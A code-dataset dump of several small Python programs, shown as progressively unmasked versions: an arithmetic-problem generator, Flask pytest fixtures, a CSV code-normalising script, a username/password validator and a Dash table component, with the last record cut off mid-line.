"step-2": "<mask token>\n\n\nclass Generator:\n <mask token>\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-3": "<mask token>\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-4": "from random import randint, shuffle\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
import os
import pytest
def get_client():
from apiserver import app, is_caching_enabled
app.config['TESTING'] = True
app.enable_cache(is_caching_enabled())
return app.test_client()
@pytest.fixture
def client():
os.environ['FLASK_ENV'] = 'testing'
yield get_client()
@pytest.fixture
def client_with_caching():
os.environ['FLASK_ENV'] = 'production'
yield get_client()
|
normal
|
{
"blob_id": "c0b5a0605bdfcb7cb84211d3ad0d24f78f838cdf",
"index": 5421,
"step-1": "<mask token>\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_client():\n from apiserver import app, is_caching_enabled\n app.config['TESTING'] = True\n app.enable_cache(is_caching_enabled())\n return app.test_client()\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_client():\n from apiserver import app, is_caching_enabled\n app.config['TESTING'] = True\n app.enable_cache(is_caching_enabled())\n return app.test_client()\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\[email protected]\ndef client_with_caching():\n os.environ['FLASK_ENV'] = 'production'\n yield get_client()\n",
"step-4": "import os\nimport pytest\n\n\ndef get_client():\n from apiserver import app, is_caching_enabled\n app.config['TESTING'] = True\n app.enable_cache(is_caching_enabled())\n return app.test_client()\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\[email protected]\ndef client_with_caching():\n os.environ['FLASK_ENV'] = 'production'\n yield get_client()\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
print('csv file not exsit,try again:')
return get_csv_path()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
print('csv file not exsit,try again:')
return get_csv_path()
def unique_code():
path = get_csv_path()
path_dir = os.path.dirname(path)
frame1 = pd.read_csv(path, encoding='utf-8')
list1 = list(frame1.iloc[:, 0])
pat1 = re.compile('\\d+-\\d+')
pat2 = re.compile('-\\D{1}-\\d+')
list2 = []
i = 100
for code in list1:
if code == '':
list2.append(i)
i += 100
elif re.match(pat1, code):
cover = code
list2.append(cover)
else:
list2.append(cover + code)
frame2 = pd.DataFrame(list2)
frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=
'utf-8-sig')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
print('csv file not exsit,try again:')
return get_csv_path()
def unique_code():
path = get_csv_path()
path_dir = os.path.dirname(path)
frame1 = pd.read_csv(path, encoding='utf-8')
list1 = list(frame1.iloc[:, 0])
pat1 = re.compile('\\d+-\\d+')
pat2 = re.compile('-\\D{1}-\\d+')
list2 = []
i = 100
for code in list1:
if code == '':
list2.append(i)
i += 100
elif re.match(pat1, code):
cover = code
list2.append(cover)
else:
list2.append(cover + code)
frame2 = pd.DataFrame(list2)
frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=
'utf-8-sig')
if __name__ == '__main__':
unique_code()
<|reserved_special_token_1|>
import re
import pandas as pd
import os
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
print('csv file not exsit,try again:')
return get_csv_path()
def unique_code():
path = get_csv_path()
path_dir = os.path.dirname(path)
frame1 = pd.read_csv(path, encoding='utf-8')
list1 = list(frame1.iloc[:, 0])
pat1 = re.compile('\\d+-\\d+')
pat2 = re.compile('-\\D{1}-\\d+')
list2 = []
i = 100
for code in list1:
if code == '':
list2.append(i)
i += 100
elif re.match(pat1, code):
cover = code
list2.append(cover)
else:
list2.append(cover + code)
frame2 = pd.DataFrame(list2)
frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=
'utf-8-sig')
if __name__ == '__main__':
unique_code()
<|reserved_special_token_1|>
#公路工程工程量清单编码默认格式母节点为数字型式,子节点为-b字母形式,为使编码唯一便于数据处理,编制此脚本
import re
import pandas as pd
import os
def get_csv_path():#原编码保存为csv文件的一列,便于读取
path=input('enter csv path:')
if os.path.isfile(path):
return path
else:
print('csv file not exsit,try again:')
return get_csv_path()
def unique_code():
path=get_csv_path()
path_dir=os.path.dirname(path)
frame1=pd.read_csv(path,encoding='utf-8')
list1=list(frame1.iloc[:,0])
pat1=re.compile(r'\d+-\d+')#数字打头的母节点匹配符
pat2=re.compile(r'-\D{1}-\d+')#二级子节点,即-字母-数字形式匹配符
list2=[]
i=100
for code in list1:
if code=='':
list2.append(i)
i+=100
elif re.match(pat1,code):
cover=code
list2.append(cover)
else:
list2.append(cover+code)
frame2=pd.DataFrame(list2,)
frame2.to_csv(os.path.join(path_dir,'code_csv_out.csv'),encoding='utf-8-sig')
if __name__=='__main__':
unique_code()
|
flexible
|
{
"blob_id": "857e3e04b99cb346fd89b34c0d14957d65b7ac38",
"index": 9566,
"step-1": "<mask token>\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\ndef unique_code():\n path = get_csv_path()\n path_dir = os.path.dirname(path)\n frame1 = pd.read_csv(path, encoding='utf-8')\n list1 = list(frame1.iloc[:, 0])\n pat1 = re.compile('\\\\d+-\\\\d+')\n pat2 = re.compile('-\\\\D{1}-\\\\d+')\n list2 = []\n i = 100\n for code in list1:\n if code == '':\n list2.append(i)\n i += 100\n elif re.match(pat1, code):\n cover = code\n list2.append(cover)\n else:\n list2.append(cover + code)\n frame2 = pd.DataFrame(list2)\n frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=\n 'utf-8-sig')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\ndef unique_code():\n path = get_csv_path()\n path_dir = os.path.dirname(path)\n frame1 = pd.read_csv(path, encoding='utf-8')\n list1 = list(frame1.iloc[:, 0])\n pat1 = re.compile('\\\\d+-\\\\d+')\n pat2 = re.compile('-\\\\D{1}-\\\\d+')\n list2 = []\n i = 100\n for code in list1:\n if code == '':\n list2.append(i)\n i += 100\n elif re.match(pat1, code):\n cover = code\n list2.append(cover)\n else:\n list2.append(cover + code)\n frame2 = pd.DataFrame(list2)\n frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=\n 'utf-8-sig')\n\n\nif __name__ == '__main__':\n unique_code()\n",
"step-4": "import re\nimport pandas as pd\nimport os\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\ndef unique_code():\n path = get_csv_path()\n path_dir = os.path.dirname(path)\n frame1 = pd.read_csv(path, encoding='utf-8')\n list1 = list(frame1.iloc[:, 0])\n pat1 = re.compile('\\\\d+-\\\\d+')\n pat2 = re.compile('-\\\\D{1}-\\\\d+')\n list2 = []\n i = 100\n for code in list1:\n if code == '':\n list2.append(i)\n i += 100\n elif re.match(pat1, code):\n cover = code\n list2.append(cover)\n else:\n list2.append(cover + code)\n frame2 = pd.DataFrame(list2)\n frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=\n 'utf-8-sig')\n\n\nif __name__ == '__main__':\n unique_code()\n",
"step-5": "#公路工程工程量清单编码默认格式母节点为数字型式,子节点为-b字母形式,为使编码唯一便于数据处理,编制此脚本\nimport re\nimport pandas as pd\nimport os\ndef get_csv_path():#原编码保存为csv文件的一列,便于读取\n path=input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\ndef unique_code():\n path=get_csv_path()\n path_dir=os.path.dirname(path)\n frame1=pd.read_csv(path,encoding='utf-8')\n list1=list(frame1.iloc[:,0])\n pat1=re.compile(r'\\d+-\\d+')#数字打头的母节点匹配符\n pat2=re.compile(r'-\\D{1}-\\d+')#二级子节点,即-字母-数字形式匹配符\n list2=[]\n i=100\n for code in list1:\n if code=='':\n list2.append(i)\n i+=100\n elif re.match(pat1,code):\n cover=code\n list2.append(cover)\n else:\n list2.append(cover+code)\n frame2=pd.DataFrame(list2,)\n frame2.to_csv(os.path.join(path_dir,'code_csv_out.csv'),encoding='utf-8-sig')\nif __name__=='__main__':\n unique_code()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def usuario():
global usser
usser = input('Introduce un usuario : ')
if len(usser) < 5 or len(usser) > 15:
print('El usuario debe tener entre 5 y 15 caracteres')
usuario()
elif usser.isalnum() == False:
print('Los valores del usurio deben ser únicamente letras o números')
usuario()
else:
print(True)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def usuario():
global usser
usser = input('Introduce un usuario : ')
if len(usser) < 5 or len(usser) > 15:
print('El usuario debe tener entre 5 y 15 caracteres')
usuario()
elif usser.isalnum() == False:
print('Los valores del usurio deben ser únicamente letras o números')
usuario()
else:
print(True)
def contraseña():
global passw
passw = input('Introduce contraseña: ')
if len(passw) <= 9:
print('La contraseña debe tener al menos 10 caractéres')
contraseña()
elif passw.isalnum() == True:
print('La contraseña debe tener al menos un carácter no alfanumérico')
contraseña()
elif passw.lower() == passw:
print('Debe haber por lo menos una mayúscula')
contraseña()
elif passw.upper() == passw:
print('Debe haber por lo menos una minúscula')
contraseña()
for i in passw:
if i == ' ':
print('La contraseña no debe tener espacios en blanco')
contraseña()
print(True)
<|reserved_special_token_1|>
from bbdd import *
def usuario():
global usser
usser = input('Introduce un usuario : ')
if len(usser) < 5 or len(usser) > 15:
print('El usuario debe tener entre 5 y 15 caracteres')
usuario()
elif usser.isalnum() == False:
print('Los valores del usurio deben ser únicamente letras o números')
usuario()
else:
print(True)
def contraseña():
global passw
passw = input('Introduce contraseña: ')
if len(passw) <= 9:
print('La contraseña debe tener al menos 10 caractéres')
contraseña()
elif passw.isalnum() == True:
print('La contraseña debe tener al menos un carácter no alfanumérico')
contraseña()
elif passw.lower() == passw:
print('Debe haber por lo menos una mayúscula')
contraseña()
elif passw.upper() == passw:
print('Debe haber por lo menos una minúscula')
contraseña()
for i in passw:
if i == ' ':
print('La contraseña no debe tener espacios en blanco')
contraseña()
print(True)
<|reserved_special_token_1|>
from bbdd import *
def usuario():
global usser
usser=input("Introduce un usuario : ")
if len(usser)<5 or len(usser)>15:
print("El usuario debe tener entre 5 y 15 caracteres")
usuario()
elif usser.isalnum()==False:
print("Los valores del usurio deben ser únicamente letras o números")
usuario()
else:
print(True)
def contraseña():
global passw
passw=input("Introduce contraseña: ")
if len(passw)<=9:
print("La contraseña debe tener al menos 10 caractéres")
contraseña()
elif passw.isalnum()==True:
print ("La contraseña debe tener al menos un carácter no alfanumérico")
contraseña()
elif passw.lower() == passw:
print("Debe haber por lo menos una mayúscula")
contraseña()
elif passw.upper()==passw:
print("Debe haber por lo menos una minúscula")
contraseña()
for i in passw:
if i==" ":
print("La contraseña no debe tener espacios en blanco")
contraseña()
print(True)
|
flexible
|
{
"blob_id": "ce75c23c6b0862dde797225f53c900b4ebc56428",
"index": 514,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef usuario():\n global usser\n usser = input('Introduce un usuario : ')\n if len(usser) < 5 or len(usser) > 15:\n print('El usuario debe tener entre 5 y 15 caracteres')\n usuario()\n elif usser.isalnum() == False:\n print('Los valores del usurio deben ser únicamente letras o números')\n usuario()\n else:\n print(True)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef usuario():\n global usser\n usser = input('Introduce un usuario : ')\n if len(usser) < 5 or len(usser) > 15:\n print('El usuario debe tener entre 5 y 15 caracteres')\n usuario()\n elif usser.isalnum() == False:\n print('Los valores del usurio deben ser únicamente letras o números')\n usuario()\n else:\n print(True)\n\n\ndef contraseña():\n global passw\n passw = input('Introduce contraseña: ')\n if len(passw) <= 9:\n print('La contraseña debe tener al menos 10 caractéres')\n contraseña()\n elif passw.isalnum() == True:\n print('La contraseña debe tener al menos un carácter no alfanumérico')\n contraseña()\n elif passw.lower() == passw:\n print('Debe haber por lo menos una mayúscula')\n contraseña()\n elif passw.upper() == passw:\n print('Debe haber por lo menos una minúscula')\n contraseña()\n for i in passw:\n if i == ' ':\n print('La contraseña no debe tener espacios en blanco')\n contraseña()\n print(True)\n",
"step-4": "from bbdd import *\n\n\ndef usuario():\n global usser\n usser = input('Introduce un usuario : ')\n if len(usser) < 5 or len(usser) > 15:\n print('El usuario debe tener entre 5 y 15 caracteres')\n usuario()\n elif usser.isalnum() == False:\n print('Los valores del usurio deben ser únicamente letras o números')\n usuario()\n else:\n print(True)\n\n\ndef contraseña():\n global passw\n passw = input('Introduce contraseña: ')\n if len(passw) <= 9:\n print('La contraseña debe tener al menos 10 caractéres')\n contraseña()\n elif passw.isalnum() == True:\n print('La contraseña debe tener al menos un carácter no alfanumérico')\n contraseña()\n elif passw.lower() == passw:\n print('Debe haber por lo menos una mayúscula')\n contraseña()\n elif passw.upper() == passw:\n print('Debe haber por lo menos una minúscula')\n contraseña()\n for i in passw:\n if i == ' ':\n print('La contraseña no debe tener espacios en blanco')\n contraseña()\n print(True)\n",
"step-5": "from bbdd import *\n\n\ndef usuario():\n global usser\n usser=input(\"Introduce un usuario : \")\n if len(usser)<5 or len(usser)>15:\n print(\"El usuario debe tener entre 5 y 15 caracteres\")\n usuario()\n elif usser.isalnum()==False:\n print(\"Los valores del usurio deben ser únicamente letras o números\")\n usuario()\n else:\n print(True)\n\n\n\ndef contraseña():\n global passw\n passw=input(\"Introduce contraseña: \")\n if len(passw)<=9:\n print(\"La contraseña debe tener al menos 10 caractéres\")\n contraseña()\n elif passw.isalnum()==True:\n print (\"La contraseña debe tener al menos un carácter no alfanumérico\")\n contraseña()\n elif passw.lower() == passw:\n print(\"Debe haber por lo menos una mayúscula\")\n contraseña()\n elif passw.upper()==passw:\n print(\"Debe haber por lo menos una minúscula\")\n contraseña()\n\n for i in passw:\n if i==\" \":\n print(\"La contraseña no debe tener espacios en blanco\")\n contraseña()\n print(True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import dash_table
import pandas as pd
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
from dash_oop_components import DashComponent
import dash_table
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output, State
from dash_oop_components import DashFigureFactory, DashComponent, DashComponentTabs, DashApp
from src.main.python.oop.Dataframe import Dataframe
from src.main.python.oop.Figure_factories import VisualFactories
class Table(DashComponent):
def __init__(self, plot_factory, df, title="Table"):
"""
Displays table at the bottom of the page.
:param plot_factory: Factory with all plot functions
:param df: Dataframe with all data
:param title: Title of the page
"""
super().__init__(title=title)
self.plot_factory = plot_factory
self.df = df
def layout(self, params=None):
"""
Shows the html layout of the table component.
:param params: Parameters selected at the current level of the dashboard.
:return: Html layout of the program.
"""
return html.Div([
dcc.Loading(
id="loading-icon3",
children=[html.Div(id='output-data-upload')],
type="dot",
)
])
def component_callbacks(self, app):
"""
Automatically does the callbacks of the interactive parts of the table component.
:param app: Dash app that uses the code.
:return: Output of the callback functions.
"""
@app.callback(
Output('main_table', 'selected_rows' + self.title),
Input('Mygraph-normal-plot', 'selectedData'))
def display_selected_data(graphPoints):
"""
Display the selected data i the table.
:param graphPoints: Data that is currently displayed
:return: Table
"""
points_selected = []
if graphPoints is not None:
print(graphPoints)
for point in graphPoints['points']:
points_selected.append(point['customdata'][0])
return points_selected
def set_data(self, df):
"""
Loads in possible parameters for the x and y-axis in dropdown from the data.
:param dummy: dummy html property
:return: Possible options for dropdown x-axis.
"""
self.df = df
|
normal
|
{
"blob_id": "485f85ec5e3f38148978453ea5e7f9a54eb310e1",
"index": 160,
"step-1": "<mask token>\n\n\nclass Table(DashComponent):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Table(DashComponent):\n\n def __init__(self, plot_factory, df, title='Table'):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([dcc.Loading(id='loading-icon3', children=[html.Div\n (id='output-data-upload')], type='dot')])\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Table(DashComponent):\n\n def __init__(self, plot_factory, df, title='Table'):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([dcc.Loading(id='loading-icon3', children=[html.Div\n (id='output-data-upload')], type='dot')])\n\n def component_callbacks(self, app):\n \"\"\"\n Automatically does the callbacks of the interactive parts of the table component.\n :param app: Dash app that uses the code.\n :return: Output of the callback functions.\n \"\"\"\n\n @app.callback(Output('main_table', 'selected_rows' + self.title),\n Input('Mygraph-normal-plot', 'selectedData'))\n def display_selected_data(graphPoints):\n \"\"\"\n Display the selected data i the table.\n :param graphPoints: Data that is currently displayed\n :return: Table\n \"\"\"\n points_selected = []\n if graphPoints is not None:\n print(graphPoints)\n for point in graphPoints['points']:\n points_selected.append(point['customdata'][0])\n return points_selected\n\n def set_data(self, df):\n \"\"\"\n Loads in possible parameters for the x and y-axis in dropdown from the data.\n :param dummy: dummy html property\n :return: Possible options for dropdown x-axis.\n \"\"\"\n self.df = df\n",
"step-4": "import dash_table\nimport pandas as pd\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\nfrom dash_oop_components import DashComponent\nimport dash_table\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom dash_oop_components import DashFigureFactory, DashComponent, DashComponentTabs, DashApp\nfrom src.main.python.oop.Dataframe import Dataframe\nfrom src.main.python.oop.Figure_factories import VisualFactories\n\n\nclass Table(DashComponent):\n\n def __init__(self, plot_factory, df, title='Table'):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([dcc.Loading(id='loading-icon3', children=[html.Div\n (id='output-data-upload')], type='dot')])\n\n def component_callbacks(self, app):\n \"\"\"\n Automatically does the callbacks of the interactive parts of the table component.\n :param app: Dash app that uses the code.\n :return: Output of the callback functions.\n \"\"\"\n\n @app.callback(Output('main_table', 'selected_rows' + self.title),\n Input('Mygraph-normal-plot', 'selectedData'))\n def display_selected_data(graphPoints):\n \"\"\"\n Display the selected data i the table.\n :param graphPoints: Data that is currently displayed\n :return: Table\n \"\"\"\n points_selected = []\n if graphPoints is not None:\n print(graphPoints)\n for point in graphPoints['points']:\n points_selected.append(point['customdata'][0])\n return points_selected\n\n def set_data(self, df):\n \"\"\"\n Loads in possible parameters for the x and y-axis in dropdown from the data.\n :param dummy: dummy html property\n :return: Possible options for dropdown x-axis.\n \"\"\"\n self.df = df\n",
"step-5": "import dash_table\nimport pandas as pd\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\nfrom dash_oop_components import DashComponent\nimport dash_table\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom dash_oop_components import DashFigureFactory, DashComponent, DashComponentTabs, DashApp\n\n\nfrom src.main.python.oop.Dataframe import Dataframe\nfrom src.main.python.oop.Figure_factories import VisualFactories\n\nclass Table(DashComponent):\n def __init__(self, plot_factory, df, title=\"Table\"):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([\n dcc.Loading(\n id=\"loading-icon3\",\n children=[html.Div(id='output-data-upload')],\n type=\"dot\",\n )\n ])\n\n def component_callbacks(self, app):\n \"\"\"\n Automatically does the callbacks of the interactive parts of the table component.\n :param app: Dash app that uses the code.\n :return: Output of the callback functions.\n \"\"\"\n @app.callback(\n Output('main_table', 'selected_rows' + self.title),\n Input('Mygraph-normal-plot', 'selectedData'))\n def display_selected_data(graphPoints):\n \"\"\"\n Display the selected data i the table.\n :param graphPoints: Data that is currently displayed\n :return: Table\n \"\"\"\n points_selected = []\n if 